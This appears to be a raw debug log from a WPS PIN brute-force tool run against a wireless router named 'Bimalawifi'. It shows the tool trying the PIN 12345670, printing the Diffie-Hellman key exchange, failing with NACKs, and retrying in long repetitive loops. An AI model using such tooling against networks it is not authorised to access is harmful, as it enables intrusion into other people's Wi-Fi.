    WPS: DH Private Key - hexdump(len=192): c1 9d 45 a6 d6 24 53 dd 20 53 c9 cc 6e 1a 24 aa 1e 3b 2c 04 d6 e7 4e d3 98 5a be 80 e5 6d 84 b0 f8 72 2d e4 25 e6 22 a0 48 24 9b 24 76 af 6a c2 90 ef a4 81 ae a7 77 21 75 78 1b 56 d1 64 86 8c 1d 5e 62 df 60 44 dc b4 15 ba 8f 00 5a 7f 38 78 5d 64 ef 05 5b 04 43 78 7c 1e 6d 02 d6 4a 6c f8 cc 6b db 84 98 1c 45 9d ef 03 d4 c5 13 bf e3 e5 34 33 07 4c 7c d6 f6 ef f6 ce c7 bf 5c 89 cf 12 33 f8 7f f4 90 7f 06 4c 88 a8 19 a6 1c 29 f9 35 f4 cf d1 23 e9 9d c8 79 9b f3 41 79 03 f6 bb a0 22 53 e4 11 aa 0b 9e a4 a7 00 2d 86 bc b2 51 e3 70 64 9b af d2 bd dd 4a a6 f0 a9 d5 3c cb 4e 97
    WPS: DH peer Public Key - hexdump(len=192): d0 14 1b 15 65 6e 96 b8 5f ce ad 2e 8e 76 33 0d 2b 1a c1 57 6b b0 26 e7 a3 28 c0 e1 ba f8 cf 91 66 43 71 17 4c 08 ee 12 ec 92 b0 51 9c 54 87 9f 21 25 5b e5 a8 77 0e 1f a1 88 04 70 ef 42 3c 90 e3 4d 78 47 a6 fc b4 92 45 63 d1 af 1d b0 c4 81 ea d9 85 2c 51 9b f1 dd 42 9c 16 39 51 cf 69 18 1b 13 2a ea 2a 36 84 ca f3 5b c5 4a ca 1b 20 c8 8b b3 b7 33 9f f7 d5 6e 09 13 9d 77 f0 ac 58 07 90 97 93 82 51 db be 75 e8 67 15 cc 6b 7c 0c a9 45 fa 8d d8 d6 61 be b7 3b 41 40 32 79 8d ad ee 32 b5 dd 61 bf 10 5f 18 d8 92 17 76 0b 75 c5 d9 66 a5 a4 90 47 2c eb a9 e3 b4 22 4f 3d 89 fb 2b
    DH: shared key - hexdump(len=192): 54 ac fd f2 ec c9 4b 8c 0a c1 63 06 28 2f ac a1 51 1f e9 3a e5 98 f5 f1 d6 62 57 f0 28 d6 0a c0 19 8d d6 cc 66 4c ee 4b 0c 5b da 27 a2 f2 a7 b6 ee 54 56 7e 0a 40 c7 43 a6 cc 68 5e 16 3b 32 32 d8 22 89 6e 3d d1 de e6 9f f9 7e a4 74 16 36 b2 00 40 38 9c 46 5b 06 62 6c 3e b6 92 28 be 9a 38 cd 34 8b 0f cb d6 d3 da 5d fd 5f 3f b7 10 c7 66 a9 25 e1 d0 f7 95 45 d3 06 b6 ae 85 cf c4 44 a3 92 34 0d 11 6e 6e 4a c3 fe 2f 77 46 f2 7d 54 ac 28 46 f6 45 ea 25 75 c0 6c d0 e7 35 6a 31 54 ad e6 68 44 d0 b8 70 34 00 c8 55 e2 1d 35 f5 c6 52 f2 8c d6 61 3d 56 79 e7 c4 ef 4b 63 51 0a c5 22
    WPS: DH shared key - hexdump(len=192): 54 ac fd f2 ec c9 4b 8c 0a c1 63 06 28 2f ac a1 51 1f e9 3a e5 98 f5 f1 d6 62 57 f0 28 d6 0a c0 19 8d d6 cc 66 4c ee 4b 0c 5b da 27 a2 f2 a7 b6 ee 54 56 7e 0a 40 c7 43 a6 cc 68 5e 16 3b 32 32 d8 22 89 6e 3d d1 de e6 9f f9 7e a4 74 16 36 b2 00 40 38 9c 46 5b 06 62 6c 3e b6 92 28 be 9a 38 cd 34 8b 0f cb d6 d3 da 5d fd 5f 3f b7 10 c7 66 a9 25 e1 d0 f7 95 45 d3 06 b6 ae 85 cf c4 44 a3 92 34 0d 11 6e 6e 4a c3 fe 2f 77 46 f2 7d 54 ac 28 46 f6 45 ea 25 75 c0 6c d0 e7 35 6a 31 54 ad e6 68 44 d0 b8 70 34 00 c8 55 e2 1d 35 f5 c6 52 f2 8c d6 61 3d 56 79 e7 c4 ef 4b 63 51 0a c5 22
    WPS: DHKey - hexdump(len=32): 67 8b 16 16 84 0f 53 a0 a0 fc 0f 67 81 22 1c 5c 6a a4 8f 78 57 9b 1b f4 a5 b3 c3 65 79 98 f2 c4
    WPS: KDK - hexdump(len=32): 24 27 55 60 a2 ca 27 41 c6 ec b3 b5 7d 73 ab 3e 2e 4e f5 90 ae d4 2d 0e cd 81 26 af fe d0 9b b7
    WPS: AuthKey - hexdump(len=32): a0 e5 d1 c3 a2 28 4c e1 ee 35 47 e6 b5 2a 39 48 94 9b d7 0c ee ac 69 62 e8 f3 5b 1b 7f 5f 92 43
    WPS: KeyWrapKey - hexdump(len=16): a5 8d 50 59 19 70 bd d6 cf 4f 65 b7 37 52 91 ec
    WPS: EMSK - hexdump(len=32): 6a a8 7e 6c 63 31 73 a1 4c 4f b4 8b 48 d2 46 62 3a 9c 05 cd 2c 9e 44 7e 1d 0e 3f d7 55 91 3b 7d
    WPS: * Authentication Type Flags
    WPS: * Encryption Type Flags
    WPS: * Connection Type Flags
    WPS: * Config Methods (8c)
    WPS: * Manufacturer
    WPS: * Model Name
    WPS: * Model Number
    WPS: * Serial Number
    WPS: * Primary Device Type
    WPS: * Device Name
    WPS: * RF Bands (0)
    WPS: * Association State
    WPS: * Configuration Error (0)
    WPS: * Device Password ID (0)
    WPS: * OS Version
    WPS: * Authenticator
    [+] Sending M2 message
    send_packet called from send_msg() send.c:116
    WPS: Processing received message (len=422 op_code=4)
    WPS: Received WSC_MSG
    WPS: Unsupported attribute type 0x1049 len=6
    WPS: Parsed WSC_MSG
    WPS: Received M1
    WPS: Unexpected state (15) for receiving M1
    WPS: returning
    [+] Received M1 message
    WPS: Building Message WSC_NACK
    WPS: * Version
    WPS: * Message Type (14)
    WPS: * Enrollee Nonce
    WPS: * Registrar Nonce
    WPS: * Configuration Error (0)
    [+] Sending WSC NACK
    send_packet called from send_msg() send.c:116
    WPS: Building Message WSC_NACK
    WPS: * Version
    WPS: * Message Type (14)
    WPS: * Enrollee Nonce
    WPS: * Registrar Nonce
    WPS: * Configuration Error (0)
    [+] Sending WSC NACK
    send_packet called from send_msg() send.c:116
    send_packet called from send_termination() send.c:142
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    WPS: Invalidating used wildcard PIN
    WPS: Invalidated PIN for UUID - hexdump(len=16): 63 04 12 53 10 19 20 06 12 28 a8 32 9a 00 77 fe
    WPS: A new PIN configured (timeout=0)
    WPS: UUID - hexdump(len=16): [NULL]
    WPS: PIN - hexdump_ascii(len=8):
    31 32 33 34 35 36 37 30 12345670
    WPS: Selected registrar information changed
    WPS: Internal Registrar selected (pbc=0)
    WPS: sel_reg_union
    WPS: set_ie
    WPS: cb_set_sel_reg
    WPS: Enter wps_cg_set_sel_reg
    WPS: Leave wps_cg_set_sel_reg early
    WPS: return from wps_selected_registrar_changed
    [+] Trying pin "12345670"
    send_packet called from deauthenticate() 80211.c:326
    send_packet called from authenticate() 80211.c:357
    [+] Sending authentication request
    send_packet called from associate() 80211.c:410
    [+] Sending association request
    [+] Associated with A8:32:9A:00:77:FE (ESSID: Bimalawifi)
    [+] Sending EAPOL START request
    send_packet called from send_eapol_start() send.c:48
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    WPS: Processing received message (len=124 op_code=4)
    WPS: Received WSC_MSG
    WPS: Unsupported attribute type 0x1049 len=6
    WPS: Parsed WSC_MSG
    WPS: Mismatch in registrar nonce
    [+] Received M3 message
    WPS: Building Message WSC_NACK
    WPS: * Version
    WPS: * Message Type (14)
    WPS: * Enrollee Nonce
    WPS: * Registrar Nonce
    WPS: * Configuration Error (0)
    [+] Sending WSC NACK
    send_packet called from send_msg() send.c:116
    WPS: Building Message WSC_NACK
    WPS: * Version
    WPS: * Message Type (14)
    WPS: * Enrollee Nonce
    WPS: * Registrar Nonce
    WPS: * Configuration Error (0)
    [+] Sending WSC NACK
    send_packet called from send_msg() send.c:116
    send_packet called from send_termination() send.c:142
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    WPS: A new PIN configured (timeout=0)
    WPS: UUID - hexdump(len=16): [NULL]
    WPS: PIN - hexdump_ascii(len=8):
    31 32 33 34 35 36 37 30 12345670
    WPS: Selected registrar information changed
    WPS: Internal Registrar selected (pbc=0)
    WPS: sel_reg_union
    WPS: set_ie
    WPS: cb_set_sel_reg
    WPS: Enter wps_cg_set_sel_reg
    WPS: Leave wps_cg_set_sel_reg early
    WPS: return from wps_selected_registrar_changed
    [+] Trying pin "12345670"
    send_packet called from deauthenticate() 80211.c:326
    send_packet called from authenticate() 80211.c:357
    [+] Sending authentication request
    send_packet called from associate() 80211.c:410
    [+] Sending association request
    [+] Associated with A8:32:9A:00:77:FE (ESSID: Bimalawifi)
    [+] Sending EAPOL START request
    send_packet called from send_eapol_start() send.c:48
    send_packet called from resend_last_packet() send.c:161
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    WPS: Processing received message (len=422 op_code=4)
    WPS: Received WSC_MSG
    WPS: Unsupported attribute type 0x1049 len=6
    WPS: Parsed WSC_MSG
    WPS: Received M1
    WPS: UUID-E - hexdump(len=16): 63 04 12 53 10 19 20 06 12 28 a8 32 9a 00 77 fe
    WPS: Enrollee MAC Address a8:32:9a:00:77:fe
    WPS: Enrollee Nonce - hexdump(len=16): 01 a4 ce 18 6a d6 8a 7f 2b 1e ce a5 73 90 c8 c0
    WPS: Enrollee Authentication Type flags 0x27
    WPS: No match in supported authentication types (own 0x0 Enrollee 0x27)
    WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
    WPS: Enrollee Encryption Type flags 0xf
    WPS: No match in supported encryption types (own 0x0 Enrollee 0xf)
    WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
    WPS: Enrollee Connection Type flags 0x1
    WPS: Enrollee Config Methods 0x86 [Ethernet] [Label] [PBC]
    WPS: Prefer PSK format key due to Enrollee not supporting display
    WPS: Enrollee Wi-Fi Protected Setup State 2
    WPS: Manufacturer - hexdump_ascii(len=15):
    57 69 72 65 6c 65 73 73 20 52 6f 75 74 65 72 Wireless Router
    WPS: Model Name - hexdump_ascii(len=7):
    52 54 4c 38 36 37 31 RTL8671
    WPS: Model Number - hexdump_ascii(len=13):
    45 56 2d 32 30 30 36 2d 30 37 2d 32 37 EV-2006-07-27
    WPS: Serial Number - hexdump_ascii(len=15):
    31 32 33 34 35 36 37 38 39 30 31 32 33 34 37 123456789012347
    WPS: Primary Device Type: 6-0050F204-1
    WPS: Device Name - hexdump_ascii(len=15):
    57 69 72 65 6c 65 73 73 20 52 6f 75 74 65 72 Wireless Router
    WPS: Enrollee RF Bands 0x1
    WPS: Enrollee Association State 0
    WPS: Device Password ID 0
    WPS: Enrollee Configuration Error 0
    WPS: OS Version 10000000
    WPS: M1 Processed
    WPS: dev_pw_id checked
    WPS: PBC Checked
    WPS: Entering State SEND_M2
    WPS: WPS_CONTINUE, Freeing Last Message
    WPS: WPS_CONTINUE, Saving Last Message
    WPS: returning
    [+] Received M1 message
    WPS: Found a wildcard PIN. Assigned it for this UUID-E
    WPS: Registrar Nonce - hexdump(len=16): 55 2d 53 68 3f 89 69 bb 0e 6f c4 97 89 9d 48 d9
    WPS: UUID-R - hexdump(len=16): 4c 9e d4 cc b6 ee 72 10 de 46 5f 1d 9e 0b 37 ad
    WPS: Building Message M2
    WPS: * Version
    WPS: * Message Type (5)
    WPS: * Enrollee Nonce
    WPS: * Registrar Nonce
    WPS: * UUID-R
    WPS: * Public Key
    WPS: Generate new DH keys
    DH: private value - hexdump(len=192): 99 38 36 74 39 e2 1f 58 0a 6c 9a ee 10 e3 60 54 13 d6 87 24 2e 35 1d 97 ee 7a 8b c1 7a 5e 4f 76 df 4d 18 3b 60 99 a4 6f 3b b9 2c 13 c2 0c 53 83 cf 53 04 33 b5 6d 5b f7 79 5c 7c 7d 10 8c dc 89 f2 62 5b 20 9d 14 75 76 3e c9 02 41 86 81 e7 da 41 a1 b8 68 b9 30 cb 57 33 7f 92 4b 11 5c 1b f3 26 24 ed 4e 6e 7d 05 c1 22 8c ba dd 9b b0 64 74 20 3e a7 32 ef 2c 2b 5c 17 93 04 e5 09 37 01 9a 20 6a 17 41 4e 82 09 eb a8 6c 50 a6 d1 a3 81 c0 63 9f fa 0a 83 22 dc 49 fc cb 44 ee 4b 81 68 4e 6b d3 66 f1 4a b5 36 2d 32 e5 23 de db 68 72 4c e5 2c 64 f3 8c 8a cf 30 3c 0b b5 09 54 24 19 e8
    DH: public value - hexdump(len=192): 3b 89 40 ea 0c 86 93 f2 6d 98 d1 29 80 0c 2c ee a5 05 8a 32 a0 40 cb 29 2a 1e c5 0b ac ae 76 ec 10 b1 27 6f 5c 4f 0c 86 a7 74 42 c3 9d 94 46 fe 0c 87 25 f5 29 13 bf c9 62 47 ba 32 69 18 ef 1b 1d 68 c1 1c 7a 73 03 58 80 1f 66 c3 88 57 cc a0 c8 20 45 43 2a fb 06 da 1d 59 cb 8c 91 a6 54 8c 6a e2 ae f2 26 c0 4a 88 38 83 86 61 1e e7 c8 d6 9e a7 94 44 31 a5 2f 7a 77 c8 ea dc d9 6a bb e5 d2 09 cb 01 4e 99 8e 5d 25 78 06 b4 05 1d 19 3b 7f 65 21 25 d7 74 d8 f2 0e cc b8 90 5b cd 50 e7 f5 fe b2 9d 5f 2f fd d8 b1 e3 5d 41 c6 93 94 9c 4c c0 04 0f a6 d0 0e 39 aa 51 dd 9e 5c 51 10 94
    WPS: DH Private Key - hexdump(len=192): 99 38 36 74 39 e2 1f 58 0a 6c 9a ee 10 e3 60 54 13 d6 87 24 2e 35 1d 97 ee 7a 8b c1 7a 5e 4f 76 df 4d 18 3b 60 99 a4 6f 3b b9 2c 13 c2 0c 53 83 cf 53 04 33 b5 6d 5b f7 79 5c 7c 7d 10 8c dc 89 f2 62 5b 20 9d 14 75 76 3e c9 02 41 86 81 e7 da 41 a1 b8 68 b9 30 cb 57 33 7f 92 4b 11 5c 1b f3 26 24 ed 4e 6e 7d 05 c1 22 8c ba dd 9b b0 64 74 20 3e a7 32 ef 2c 2b 5c 17 93 04 e5 09 37 01 9a 20 6a 17 41 4e 82 09 eb a8 6c 50 a6 d1 a3 81 c0 63 9f fa 0a 83 22 dc 49 fc cb 44 ee 4b 81 68 4e 6b d3 66 f1 4a b5 36 2d 32 e5 23 de db 68 72 4c e5 2c 64 f3 8c 8a cf 30 3c 0b b5 09 54 24 19 e8
    WPS: DH own Public Key - hexdump(len=192): 3b 89 40 ea 0c 86 93 f2 6d 98 d1 29 80 0c 2c ee a5 05 8a 32 a0 40 cb 29 2a 1e c5 0b ac ae 76 ec 10 b1 27 6f 5c 4f 0c 86 a7 74 42 c3 9d 94 46 fe 0c 87 25 f5 29 13 bf c9 62 47 ba 32 69 18 ef 1b 1d 68 c1 1c 7a 73 03 58 80 1f 66 c3 88 57 cc a0 c8 20 45 43 2a fb 06 da 1d 59 cb 8c 91 a6 54 8c 6a e2 ae f2 26 c0 4a 88 38 83 86 61 1e e7 c8 d6 9e a7 94 44 31 a5 2f 7a 77 c8 ea dc d9 6a bb e5 d2 09 cb 01 4e 99 8e 5d 25 78 06 b4 05 1d 19 3b 7f 65 21 25 d7 74 d8 f2 0e cc b8 90 5b cd 50 e7 f5 fe b2 9d 5f 2f fd d8 b1 e3 5d 41 c6 93 94 9c 4c c0 04 0f a6 d0 0e 39 aa 51 dd 9e 5c 51 10 94
    WPS: DH Private Key - hexdump(len=192): 99 38 36 74 39 e2 1f 58 0a 6c 9a ee 10 e3 60 54 13 d6 87 24 2e 35 1d 97 ee 7a 8b c1 7a 5e 4f 76 df 4d 18 3b 60 99 a4 6f 3b b9 2c 13 c2 0c 53 83 cf 53 04 33 b5 6d 5b f7 79 5c 7c 7d 10 8c dc 89 f2 62 5b 20 9d 14 75 76 3e c9 02 41 86 81 e7 da 41 a1 b8 68 b9 30 cb 57 33 7f 92 4b 11 5c 1b f3 26 24 ed 4e 6e 7d 05 c1 22 8c ba dd 9b b0 64 74 20 3e a7 32 ef 2c 2b 5c 17 93 04 e5 09 37 01 9a 20 6a 17 41 4e 82 09 eb a8 6c 50 a6 d1 a3 81 c0 63 9f fa 0a 83 22 dc 49 fc cb 44 ee 4b 81 68 4e 6b d3 66 f1 4a b5 36 2d 32 e5 23 de db 68 72 4c e5 2c 64 f3 8c 8a cf 30 3c 0b b5 09 54 24 19 e8
    WPS: DH peer Public Key - hexdump(len=192): d0 14 1b 15 65 6e 96 b8 5f ce ad 2e 8e 76 33 0d 2b 1a c1 57 6b b0 26 e7 a3 28 c0 e1 ba f8 cf 91 66 43 71 17 4c 08 ee 12 ec 92 b0 51 9c 54 87 9f 21 25 5b e5 a8 77 0e 1f a1 88 04 70 ef 42 3c 90 e3 4d 78 47 a6 fc b4 92 45 63 d1 af 1d b0 c4 81 ea d9 85 2c 51 9b f1 dd 42 9c 16 39 51 cf 69 18 1b 13 2a ea 2a 36 84 ca f3 5b c5 4a ca 1b 20 c8 8b b3 b7 33 9f f7 d5 6e 09 13 9d 77 f0 ac 58 07 90 97 93 82 51 db be 75 e8 67 15 cc 6b 7c 0c a9 45 fa 8d d8 d6 61 be b7 3b 41 40 32 79 8d ad ee 32 b5 dd 61 bf 10 5f 18 d8 92 17 76 0b 75 c5 d9 66 a5 a4 90 47 2c eb a9 e3 b4 22 4f 3d 89 fb 2b
    DH: shared key - hexdump(len=192): 16 a3 92 1c a0 e1 e7 3e 67 ac 76 16 26 e9 cb 41 8a b7 7a 9f 78 8d c2 fc 79 7e 64 1b e2 e8 5d ae 6f ad d7 15 a6 cf f5 93 33 af 83 bc 36 82 de 39 d7 e2 b1 4f d9 e6 ae 01 25 59 b7 ba 1d 06 c2 1f cf 94 30 93 c0 88 4d e7 ec 97 0c 1c 0c 25 a5 7b af be d7 a1 4e ba da 8c e1 3f 77 5e dd 26 11 72 1a 13 c2 51 40 6a db b5 2a cb d9 6f 5f 70 2b fa 06 f8 2e 51 38 8f 81 ac fb bd b2 ff c7 a8 c3 2d 40 66 00 a7 08 f0 d1 16 be a8 bb 59 93 e8 0f 6d 7c da 28 85 cd d9 80 ba 72 30 12 7d 9f 5f 83 eb 7d 19 de 72 1c cc 1e 3a c0 50 93 b9 84 05 2f e3 a0 5f f0 69 99 78 d2 8f 18 0c 57 e1 60 8d 18 60
    WPS: DH shared key - hexdump(len=192): 16 a3 92 1c a0 e1 e7 3e 67 ac 76 16 26 e9 cb 41 8a b7 7a 9f 78 8d c2 fc 79 7e 64 1b e2 e8 5d ae 6f ad d7 15 a6 cf f5 93 33 af 83 bc 36 82 de 39 d7 e2 b1 4f d9 e6 ae 01 25 59 b7 ba 1d 06 c2 1f cf 94 30 93 c0 88 4d e7 ec 97 0c 1c 0c 25 a5 7b af be d7 a1 4e ba da 8c e1 3f 77 5e dd 26 11 72 1a 13 c2 51 40 6a db b5 2a cb d9 6f 5f 70 2b fa 06 f8 2e 51 38 8f 81 ac fb bd b2 ff c7 a8 c3 2d 40 66 00 a7 08 f0 d1 16 be a8 bb 59 93 e8 0f 6d 7c da 28 85 cd d9 80 ba 72 30 12 7d 9f 5f 83 eb 7d 19 de 72 1c cc 1e 3a c0 50 93 b9 84 05 2f e3 a0 5f f0 69 99 78 d2 8f 18 0c 57 e1 60 8d 18 60
    WPS: DHKey - hexdump(len=32): d7 36 10 f2 7e a1 e4 24 cc ac 5d d4 2e 88 10 07 aa 68 e0 65 c8 44 f5 ca 23 32 db 17 5d ab 2a c4
    WPS: KDK - hexdump(len=32): 73 8d da d5 ad ce 0e a7 e9 4f 7a 86 33 85 ff eb 46 03 59 29 f1 d2 d8 5e a4 6b 6c b4 21 51 3a 97
    WPS: AuthKey - hexdump(len=32): 63 6d 69 4c ce 96 cf 2d e6 98 9a 51 5d f5 a0 be e5 08 fa f2 f1 b8 a0 cf 85 8d 1c 19 98 86 38 a2
    WPS: KeyWrapKey - hexdump(len=16): 9b a9 9b 2a b6 b1 5b 94 23 d5 08 59 0a 36 94 0f
    WPS: EMSK - hexdump(len=32): 6c 52 2a 37 ec ac 42 29 cd af f7 00 32 e5 ee 91 39 82 6c ad d6 d8 0b dc e9 18 7b f4 17 10 18 98
    WPS: * Authentication Type Flags
    WPS: * Encryption Type Flags
    WPS: * Connection Type Flags
    WPS: * Config Methods (8c)
    WPS: * Manufacturer
    WPS: * Model Name
    WPS: * Model Number
    WPS: * Serial Number
    WPS: * Primary Device Type
    WPS: * Device Name
    WPS: * RF Bands (0)
    WPS: * Association State
    WPS: * Configuration Error (0)
    WPS: * Device Password ID (0)
    WPS: * OS Version
    WPS: * Authenticator
    [+] Sending M2 message
    send_packet called from send_msg() send.c:116
    WPS: Processing received message (len=422 op_code=4)
    WPS: Received WSC_MSG
    WPS: Unsupported attribute type 0x1049 len=6
    WPS: Parsed WSC_MSG
    WPS: Received M1
    WPS: Unexpected state (15) for receiving M1
    WPS: returning
    [+] Received M1 message
    WPS: Building Message WSC_NACK
    WPS: * Version
    WPS: * Message Type (14)
    WPS: * Enrollee Nonce
    WPS: * Registrar Nonce
    WPS: * Configuration Error (0)
    [+] Sending WSC NACK
    send_packet called from send_msg() send.c:116
    WPS: Building Message WSC_NACK
    WPS: * Version
    WPS: * Message Type (14)
    WPS: * Enrollee Nonce
    WPS: * Registrar Nonce
    WPS: * Configuration Error (0)
    [+] Sending WSC NACK
    send_packet called from send_msg() send.c:116
    send_packet called from send_termination() send.c:142
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    WPS: Invalidating used wildcard PIN
    WPS: Invalidated PIN for UUID - hexdump(len=16): 63 04 12 53 10 19 20 06 12 28 a8 32 9a 00 77 fe
    WPS: A new PIN configured (timeout=0)
    WPS: UUID - hexdump(len=16): [NULL]
    WPS: PIN - hexdump_ascii(len=8):
    31 32 33 34 35 36 37 30 12345670
    WPS: Selected registrar information changed
    WPS: Internal Registrar selected (pbc=0)
    WPS: sel_reg_union
    WPS: set_ie
    WPS: cb_set_sel_reg
    WPS: Enter wps_cg_set_sel_reg
    WPS: Leave wps_cg_set_sel_reg early
    WPS: return from wps_selected_registrar_changed
    [+] Trying pin "12345670"
    send_packet called from deauthenticate() 80211.c:326
    send_packet called from authenticate() 80211.c:357
    [+] Sending authentication request
    send_packet called from associate() 80211.c:410
    [+] Sending association request
    [+] Associated with A8:32:9A:00:77:FE (ESSID: Bimalawifi)
    [+] Sending EAPOL START request
    send_packet called from send_eapol_start() send.c:48
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    WPS: Building Message WSC_NACK
    WPS: * Version
    WPS: * Message Type (14)
    WPS: * Enrollee Nonce
    WPS: * Registrar Nonce
    WPS: * Configuration Error (0)
    [+] Sending WSC NACK
    send_packet called from send_msg() send.c:116
    send_packet called from send_termination() send.c:142
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    WPS: A new PIN configured (timeout=0)
    WPS: UUID - hexdump(len=16): [NULL]
    WPS: PIN - hexdump_ascii(len=8):
    31 32 33 34 35 36 37 30 12345670
    WPS: Selected registrar information changed
    WPS: Internal Registrar selected (pbc=0)
    WPS: sel_reg_union
    WPS: set_ie
    WPS: cb_set_sel_reg
    WPS: Enter wps_cg_set_sel_reg
    WPS: Leave wps_cg_set_sel_reg early
    WPS: return from wps_selected_registrar_changed
    [+] Trying pin "12345670"
    send_packet called from deauthenticate() 80211.c:326
    send_packet called from authenticate() 80211.c:357
    [+] Sending authentication request
    send_packet called from associate() 80211.c:410
    [+] Sending association request
    [+] Associated with A8:32:9A:00:77:FE (ESSID: Bimalawifi)
    [+] Sending EAPOL START request
    send_packet called from send_eapol_start() send.c:48
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
